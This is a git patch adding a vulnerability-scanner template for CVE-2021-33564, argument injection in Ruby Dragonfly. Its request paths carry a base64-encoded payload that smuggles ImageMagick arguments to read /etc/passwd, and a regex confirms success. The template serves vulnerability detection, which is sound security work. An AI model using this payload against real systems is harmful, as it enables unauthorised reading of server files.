From 0d8c5607cb85685404a70fa8c1c28d1346fd7d51 Mon Sep 17 00:00:00 2001 From: 0xsapra Date: Sat, 29 May 2021 02:33:38 +0530 Subject: [PATCH] CVE-2021-33564.yaml --- cves/2021/CVE-2021-33564.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 cves/2021/CVE-2021-33564.yaml diff --git a/cves/2021/CVE-2021-33564.yaml b/cves/2021/CVE-2021-33564.yaml new file mode 100644 index 0000000000..8e58d848d4 --- /dev/null +++ b/cves/2021/CVE-2021-33564.yaml @@ -0,0 +1,23 @@ +id: CVE-2021-33564 + +info: + name: Argument Injection in Ruby Dragonfly + author: 0xsapra + severity: critical + reference: https://zxsecurity.co.nz/research/argunment-injection-ruby-dragonfly/ + tags: cve,cve2021,rce,ruby + +requests: + - method: GET + path: + - "{{BaseURL}}/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==" + - "{{BaseURL}}/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:[x*]:0:0:"